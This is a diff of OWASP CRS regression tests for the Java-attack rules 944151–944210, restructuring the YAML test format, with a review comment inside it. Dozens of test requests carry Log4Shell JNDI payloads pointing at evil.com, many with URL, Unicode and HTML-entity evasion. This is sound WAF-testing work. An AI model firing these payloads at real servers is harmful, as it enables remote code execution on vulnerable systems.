headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": 
"%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-20 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-21 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-22 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + 
version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-23 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: '${jndi:ldap://evil.om/w}' - Content-Type: text/html - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-24 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id 
"944151" - - test_title: 944151-25 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 25 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944151" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} + version: "HTTP/1.1" + output: + log_contains: id "944151" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml index e88f83f63..17d937eef 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml 
@@ -3,472 +3,445 @@ # 944152 should detect the same things as 944152 and 944151. meta: author: "dune73, Max Leske, azurit" - enabled: true - name: "944152.yaml" description: "Description" +rule_id: 944152 tests: - - test_title: 944152-1 + - test_id: 1 desc: Log4J exploit on arg foo stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${jndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-2 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${jndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 2 desc: Log4J exploit on User-Agent stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-3 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 3 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-4 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS 
test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 4 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: "${jndi:ldap://evil.com/webshell}" - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-5 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: "${jndi:ldap://evil.com/webshell}" + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" 
- - test_title: 944152-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$\u007Bjndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 9 desc: Log4J exploit on JSON with URL encoding 
evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-10 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-11 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-12 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + 
Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-13 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-14 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 14 desc: Log4J exploit on JSON with numeric HTML entity evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": 
"${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-15 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-16 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-17 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + 
output: + log_contains: id "944152" + - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-18 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-19 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": 
"%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-20 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-21 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-22 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + 
version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-23 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: '${jndi:ldap://evil.om/w}' - Content-Type: text/html - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-24 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id 
"944152" - - test_title: 944152-25 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 25 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-26 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 26 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracesomethingnotcoveredbyotherrules"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracesomethingnotcoveredbyotherrules"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" 
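Review bot: Test 26 at the end of the hunk sends a JSON body, `data: '{"foo": "$\u0026lbracesomethingnotcoveredbyotherrules"}'`, under `Content-Type: application/x-www-form-urlencoded` with the desc `Log4J exploit on arg foo, with evasion`, so a form-body parser will not see an argument named foo and the description does not say what the case actually exercises; either use `Content-Type: application/json` as tests 9–24 do, or reword the desc to state that the JSON text is deliberately sent as a raw form body (landing in the argument name rather than a value). `description: "Description"` survives as a placeholder now that `name` is dropped and `rule_id: 944152` is added; `description: "Positive tests for rule 944152"` would match the wording the same series uses for 944210. The context comment at the top of the hunk, `# 944152 should detect the same things as 944152 and 944151.`, reads as self-referential and presumably means 944150, though that is inferred rather than visible here.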
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml index 288c536ec..a5af12663 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml @@ -1,17 +1,15 @@ --- meta: author: "spartantri" - enabled: true - name: "944200.yaml" description: "Description" +rule_id: 944200 tests: - - test_title: 944200-1 + - test_id: 1 desc: Argument test includes java serialization magic bytes, base64 encoded request stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - encoded_request: "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" - output: - log_contains: "id \"944200\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + encoded_request: "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" + output: + log_contains: "id \"944200\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml index da10d5c1b..01a32eea9 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml 
@@ -1,1108 +1,1056 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944210.yaml" description: "Positive tests for rule 944210" +rule_id: 944210 tests: - - test_title: 944210-1 + - test_id: 1 desc: "Argument test includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_id: 2 desc: "Argument name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "rO0ABQ=test" - output: - log_contains: "id \"944210\"" - - test_title: 944210-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
